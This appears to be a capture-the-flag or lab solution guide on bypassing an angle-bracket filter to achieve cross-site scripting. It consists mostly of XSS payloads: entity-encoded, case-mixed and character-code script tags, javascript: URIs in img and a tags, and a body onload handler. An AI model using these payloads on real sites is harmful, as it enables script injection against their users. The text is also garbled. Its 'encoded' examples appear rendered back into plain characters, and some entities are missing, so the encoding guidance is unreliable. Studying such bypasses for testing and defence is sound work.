TL;DR
Angle bracket filters block basic HTML tags like <script>. We can bypass this by using alternative encoding, case mixing, or injecting HTML entities to reconstruct the tag.
Solution Guide
- Understand the Filter: The filter likely looks for literal angle brackets (< and >) in user input. It aims to prevent direct injection of HTML tags.
- Alternative Encoding (HTML Entities): Replace angle brackets with their corresponding HTML entities:
<represents <>represents >
Try injecting:
<script>alert(1)</script>. The browser should interpret this as a script tag. - Case Mixing: Some filters are case-sensitive. Try variations like:
≪<ScRiPt>alert(1)</sCrIpT>&lT;<script>alert(1)</script>
- Double Encoding: If the server decodes HTML entities multiple times, double encoding can help. For example:
- Encode
<script>alert(1)</script>to<script>alert(1)</script>
- Encode
- Using Character Codes: Use the decimal or hexadecimal character codes for angle brackets:
- Decimal:
<script>alert(1)</script> - Hexadecimal:
<script>alert(1)</script>
- Decimal:
- Tag Attributes: Inject JavaScript into tag attributes. This often bypasses filters focused on the main tag structure.
<img src="javascript:alert(1)"><body onload=alert(1)>
- Context Matters: Where is the input being used? If it’s inside an attribute, you might need to use single quotes instead of double quotes:
<img src='javascript:alert(1)'>
- URL Encoding: If the input is URL encoded, try encoding the payload accordingly.
- Nested Tags: Sometimes nesting tags can work:
<a href="javascript:alert(1)"><script>alert(1)</script></a>
- Browser Variations: Different browsers handle XSS payloads differently. Test your exploits in multiple browsers (Chrome, Firefox, Safari, Edge).
Remember to always test responsibly and only on systems you have permission to assess.